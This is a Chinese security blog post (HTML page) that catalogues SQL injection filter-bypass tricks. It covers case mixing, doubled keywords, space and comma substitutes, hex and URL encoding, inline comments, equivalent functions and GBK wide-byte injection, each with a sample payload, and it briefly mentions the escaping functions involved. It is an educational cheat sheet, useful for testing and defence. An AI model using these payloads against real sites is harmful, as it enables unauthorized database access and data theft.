<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>SQL注入绕过技巧 | Rakitic-Fans</title><meta name="description" content="SQL注入绕过技巧"><meta name="keywords" content="SQL注入"><meta name="author" content="Zhairui"><meta name="copyright" content="Zhairui"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="canonical" href="http://yoursite.com/2019/08/09/SQL注入绕过技巧/"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="SQL注入绕过技巧"><meta name="twitter:description" content="SQL注入绕过技巧"><meta name="twitter:image" content="http://yoursite.com/img/avator.jpg"><meta property="og:type" content="article"><meta property="og:title" content="SQL注入绕过技巧"><meta property="og:url" content="http://yoursite.com/2019/08/09/SQL注入绕过技巧/"><meta property="og:site_name" content="Rakitic-Fans"><meta property="og:description" content="SQL注入绕过技巧"><meta property="og:image" content="http://yoursite.com/img/avator.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="prev" title="报错注入" href="http://yoursite.com/2019/08/09/报错注入/"><link rel="next" title="SQL注入基本知识" href="http://yoursite.com/2019/08/09/SQL注入基本知识/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://zhairui-hacker.github.io","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  highlight_copy: 'true',
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: '添加书签',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天'

  
}</script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#大小写绕过："><span class="toc-number">1.</span> <span class="toc-text">大小写绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#替换关键字："><span class="toc-number">2.</span> <span class="toc-text">替换关键字：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#空格绕过："><span class="toc-number">3.</span> <span class="toc-text">空格绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#引号绕过（用16进制）："><span class="toc-number">4.</span> <span class="toc-text">引号绕过（用16进制）：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#逗号绕过："><span class="toc-number">5.</span> <span class="toc-text">逗号绕过：</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#使用from-for绕过（substr-和mid-可以使用-："><span class="toc-number">5.0.0.0.0.1.</span> <span class="toc-text">使用from for绕过（substr()和mid()可以使用)：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#使用join绕过："><span class="toc-number">5.0.0.0.0.2.</span> <span class="toc-text">使用join绕过：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#使用like："><span class="toc-number">5.0.0.0.0.3.</span> <span class="toc-text">使用like：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#对于limit可以使用offset来绕过："><span class="toc-number">5.0.0.0.0.4.</span> <span class="toc-text">对于limit可以使用offset来绕过：</span></a></li></ol></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#比较符号绕过（’-gt-’-’-lt-’-’-’）："><span class="toc-number">6.</span> <span class="toc-text">比较符号绕过（’&gt;’,’&lt;’,’=’）：</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#用greatest，least代替大于小于符号："><span class="toc-number">6.0.0.0.0.1.</span> <span class="toc-text">用greatest，least代替大于小于符号：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#使用between-and："><span class="toc-number">6.0.0.0.0.2.</span> <span class="toc-text">使用between and：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#绕过等号："><span class="toc-number">6.0.0.0.0.3.</span> <span class="toc-text">绕过等号：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#or-and-xor-not绕过："><span class="toc-number">7.</span> <span class="toc-text">or and xor not绕过：</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#使用大小写、替换关键字绕过："><span class="toc-number">7.0.0.0.0.1.</span> <span class="toc-text">使用大小写、替换关键字绕过：</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#使用字符代替："><span class="toc-number">7.0.0.0.0.2.</span> <span class="toc-text">使用字符代替：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#注释符号绕过："><span class="toc-number">8.</span> <span class="toc-text">注释符号绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#内联绕过："><span class="toc-number">9.</span> <span class="toc-text">内联绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通用编码绕过："><span class="toc-number">10.</span> <span class="toc-text">通用编码绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#等价函数绕过："><span class="toc-number">11.</span> <span class="toc-text">等价函数绕过：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#宽字节注入："><span class="toc-number">12.</span> <span class="toc-text">宽字节注入：</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#一般产生宽字节注入的PHP函数："><span class="toc-number">12.0.0.0.0.1.</span> <span class="toc-text">一般产生宽字节注入的PHP函数：</span></a></li></ol></li></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://ws1.sinaimg.cn/large/006bOYmUgy1g79a2o6o0mj30sg0hs45j.jpg)"><div id="page-header"><span class="pull-left"> <a class="blog_title" id="site-name" href="/">Rakitic-Fans</a></span><div class="open toggle-menu pull-right"><div class="menu-icon-first"></div><div class="menu-icon-second"></div><div class="menu-icon-third"></div></div><span class="pull-right menus"><div class="mobile_author_icon"><img class="lozad" data-src="/img/avator.jpg" onerror="onerror=null;src='/img/friend_404.gif'"><div class="mobile_author-info__description"></div></div><hr><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-coffee"></i><span> 留言板</span></a><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 链接</span></a><a class="site-page" href="/gallery/"><i class="fa-fw fa fa-image"></i><span> 相册</span></a><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a><script>document.body.addEventListener('touchstart', function(){ });</script></div></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title"><div class="posttitle">SQL注入绕过技巧</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-08-09<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2019-08-09</time><span class="post-meta__separator mobile_hidden">|</span><span class="mobile_hidden"><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web安全/">Web安全</a></span></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="大小写绕过："><a href="#大小写绕过：" class="headerlink" title="大小写绕过："></a>大小写绕过：</h1><p>此类绕过不经常使用，但是用的时候也不能忘了它，他原理是基于SQL语句不分大小写的，但过滤只过滤其中一种。</p>
<p>例如：id=1 UNion SElecT  1,2,3</p>
<h1 id="替换关键字："><a href="#替换关键字：" class="headerlink" title="替换关键字："></a>替换关键字：</h1><p>这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过。</p>
<p>例如：id=1 UNIunionON SELselectECT 1,2,3</p>
<h1 id="空格绕过："><a href="#空格绕过：" class="headerlink" title="空格绕过："></a>空格绕过：</h1><p>有些情况SQL会过滤空格，使得空格无法生效，可以用一下方式绕过。</p>
<p>例如：</p>
<p>id=1<code>/**/</code>union<code>/**/</code>select<code>/**/</code>1,2,3    //用<code>/**/</code>代替空格</p>
<p>id=1%0aunion%a0select%a01,2,3             //用%0a(回车)代替空格</p>
<p>id=1()union()select()1,2,3                           //用()代替空格</p>
<p>……</p>
<h1 id="引号绕过（用16进制）："><a href="#引号绕过（用16进制）：" class="headerlink" title="引号绕过（用16进制）："></a>引号绕过（用16进制）：</h1><p>会使用到引号的地方一般是在最后的where子句中，如select column_name  from information_schema.tables where table_name=’users’</p>
<p>将’users’转变为16进制为0x7573657273</p>
<h1 id="逗号绕过："><a href="#逗号绕过：" class="headerlink" title="逗号绕过："></a>逗号绕过：</h1><p>在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。</p>
<h6 id="使用from-for绕过（substr-和mid-可以使用-："><a href="#使用from-for绕过（substr-和mid-可以使用-：" class="headerlink" title="使用from for绕过（substr()和mid()可以使用)："></a>使用from for绕过（substr()和mid()可以使用)：</h6><p>例：id=1 and substr(database(),1,1)=’a’</p>
<p>​        id=1 and substr(database() from 1 for 1)=’1’</p>
<h6 id="使用join绕过："><a href="#使用join绕过：" class="headerlink" title="使用join绕过："></a>使用join绕过：</h6><p>union select 1,2等价于union select * from (select 1)a join (select 2)b</p>
<h6 id="使用like："><a href="#使用like：" class="headerlink" title="使用like："></a>使用like：</h6><p>select ascii(mid(user(),1,1))=80等价于select user() like ‘r%’</p>
<h6 id="对于limit可以使用offset来绕过："><a href="#对于limit可以使用offset来绕过：" class="headerlink" title="对于limit可以使用offset来绕过："></a>对于limit可以使用offset来绕过：</h6><p>select * from news limit 0,1等价于select * from news limit 1 offset 0</p>
<h1 id="比较符号绕过（’-gt-’-’-lt-’-’-’）："><a href="#比较符号绕过（’-gt-’-’-lt-’-’-’）：" class="headerlink" title="比较符号绕过（’&gt;’,’&lt;’,’=’）："></a>比较符号绕过（’&gt;’,’&lt;’,’=’）：</h1><p>同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。</p>
<h6 id="用greatest，least代替大于小于符号："><a href="#用greatest，least代替大于小于符号：" class="headerlink" title="用greatest，least代替大于小于符号："></a>用greatest，least代替大于小于符号：</h6><p>例：id=1 and length(database())&gt;2</p>
<p>​        id=1 and greatest(length(database()),2)=2</p>
<p>​        *greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。</p>
<h6 id="使用between-and："><a href="#使用between-and：" class="headerlink" title="使用between and："></a>使用between and：</h6><p>*between a and b：返回a，b之间的数据，不包含b。</p>
<h6 id="绕过等号："><a href="#绕过等号：" class="headerlink" title="绕过等号："></a>绕过等号：</h6><p>使用like 、rlike 、regexp 或者 使用&lt; 或者 &gt;</p>
<h1 id="or-and-xor-not绕过："><a href="#or-and-xor-not绕过：" class="headerlink" title="or and xor not绕过："></a>or and xor not绕过：</h1><p>有些时候SQL会过滤上述的关键字，导致输入的关键字不能执行。</p>
<h6 id="使用大小写、替换关键字绕过："><a href="#使用大小写、替换关键字绕过：" class="headerlink" title="使用大小写、替换关键字绕过："></a>使用大小写、替换关键字绕过：</h6><p>id=1 and 1=1等价于id=1 aandnd 1=1</p>
<p>id=1 and 1=1等价于id=1 ANd 1=1</p>
<h6 id="使用字符代替："><a href="#使用字符代替：" class="headerlink" title="使用字符代替："></a>使用字符代替：</h6><p>or=||    </p>
<p>and=&amp;&amp;    </p>
<p>xor=|    </p>
<p>not=!</p>
<h1 id="注释符号绕过："><a href="#注释符号绕过：" class="headerlink" title="注释符号绕过："></a>注释符号绕过：</h1><p>一般常用注释符号有#，–+，– ，– -等，但是SQL如果过滤了这些注释符，就会使得注释无效。</p>
<p>例：id=1’ union select 1,2,3</p>
<p>id=1’ union select 1,2,3||’1或者id=1’ union select 1,2,’3</p>
<p>*单引号的作用是将后面的单引号闭合掉</p>
<h1 id="内联绕过："><a href="#内联绕过：" class="headerlink" title="内联绕过："></a>内联绕过：</h1><p>例如，一个函数过滤了select关键字，双写，大小写等方法都不奏效，这时可以使用内联绕过。</p>
<p>id=1 union select 1,database(),3</p>
<p>这里可以用<code>/*!select*/</code>代替select，<code>/*！*/</code>中的内容将强制执行</p>
<h1 id="通用编码绕过："><a href="#通用编码绕过：" class="headerlink" title="通用编码绕过："></a>通用编码绕过：</h1><p>如URLEncode编码，ASCII,HEX,unicode编码绕过：</p>
<p>or 1=1即为%6f%72%20%31%3d%31</p>
<h1 id="等价函数绕过："><a href="#等价函数绕过：" class="headerlink" title="等价函数绕过："></a>等价函数绕过：</h1><p>SQL若过滤了每个函数导致函数不能使用，可以寻找它的等价函数来替代当前函数。</p>
<p>hex()、bin() ==&gt; ascii()</p>
<p>sleep() ==&gt;benchmark()</p>
<p>concat_ws()==&gt;group_concat()</p>
<p>mid()、substr() ==&gt; substring()</p>
<h1 id="宽字节注入："><a href="#宽字节注入：" class="headerlink" title="宽字节注入："></a>宽字节注入：</h1><p>过滤 ‘ 的时候往往利用的思路是将 ‘ 转换为 &#39; 。</p>
<p>在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路。</p>
<p>1、%df 吃掉 \ 具体的方法是 urlencode(‘) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（’）符号在外面：id=-1%df%27union select 1,user(),3–+
　　</p>
<p>2、将 &#39; 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。</p>
<h6 id="一般产生宽字节注入的PHP函数："><a href="#一般产生宽字节注入的PHP函数：" class="headerlink" title="一般产生宽字节注入的PHP函数："></a>一般产生宽字节注入的PHP函数：</h6><p>   1.replace（）：过滤 ‘ \ ，将 ‘ 转化为 &#39; ，将 \  转为 \，将 “ 转为 &quot; 。用思路一。</p>
<p>   2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：’ , “ , \ 。用思路一</p>
<p>（防御此漏洞，要将 mysql_query 设置为 binary 的方式）</p>
<p>3.mysql_real_escape_string()：转义下列字符：\x00     \n     \r     \     ‘     “     \x1a</p>
<p>（防御方法，将mysql编码方式设置为gbk即可）</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Zhairui</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://yoursite.com/2019/08/09/SQL注入绕过技巧/">http://yoursite.com/2019/08/09/SQL注入绕过技巧/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://yoursite.com">Rakitic-Fans</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SQL注入/">SQL注入    </a></div><div class="post_share"><div class="social-share" data-image="/img/avator.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-buttom"><i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lozad post-qr-code__img" data-src="/img/wechat.jpg"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lozad post-qr-code__img" data-src="/img/alipay.jpg"><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull-left"><a href="/2019/08/09/报错注入/"><img class="prev_cover lozad" data-src="/img/hack8.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>报错注入</span></div></a></div><div class="next-post pull-right"><a href="/2019/08/09/SQL注入基本知识/"><img class="next_cover lozad" data-src="/img/hack3.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>SQL注入基本知识</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span>相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2019/08/09/Base64注入/" title="BASE64注入"><img class="relatedPosts_cover lozad" data-src="/img/hack3.jpg"><div class="relatedPosts_title">BASE64注入</div></a></div><div class="relatedPosts_item"><a href="/2019/08/09/Cookie注入/" title="Cookie注入"><img class="relatedPosts_cover lozad" data-src="/img/hack5.jpg"><div class="relatedPosts_title">Cookie注入</div></a></div><div class="relatedPosts_item"><a href="/2019/08/09/SQL注入基本知识/" title="SQL注入基本知识"><img class="relatedPosts_cover lozad" data-src="/img/hack3.jpg"><div class="relatedPosts_title">SQL注入基本知识</div></a></div><div class="relatedPosts_item"><a href="/2019/08/09/二次注入/" title="二次注入"><img class="relatedPosts_cover lozad" data-src="/img/hack5.jpg"><div class="relatedPosts_title">二次注入</div></a></div><div class="relatedPosts_item"><a href="/2019/08/09/堆叠注入/" title="堆叠注入"><img class="relatedPosts_cover lozad" data-src="/img/hack5.jpg"><div class="relatedPosts_title">堆叠注入</div></a></div><div class="relatedPosts_item"><a href="/2019/08/09/宽字节注入/" title="宽字节注入"><img class="relatedPosts_cover lozad" data-src="/img/hack2.jpg"><div class="relatedPosts_title">宽字节注入</div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span>评论</span></div><div id="lv-container" data-id="city" data-uid="MTAyMC80NTk1MC8yMjQ2MQ=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 By Zhairui</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="footer_custom_text">欢迎来到我的博客！喜欢的话点个收藏吧！</div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><section class="rightside" id="rightside"><i class="fa fa-book" id="readmode" title="阅读模式"> </i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换">繁</a><i class="fa fa-moon-o nightshift" id="nightshift" title="夜间模式"></i></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/js-cookie@2/src/js.cookie.min.js"></script><script src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="/js/third-party/fireworks.js"></script><script src="/js/nightshift.js"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zindex="-1" data-click="false"></script><script id="ribbon" src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/js/piao.js"></script><script src="/js/tw_cn.js"></script><script>translateInitilization()

</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@1.2.2/instantpage.min.js" type="module"></script></body></html>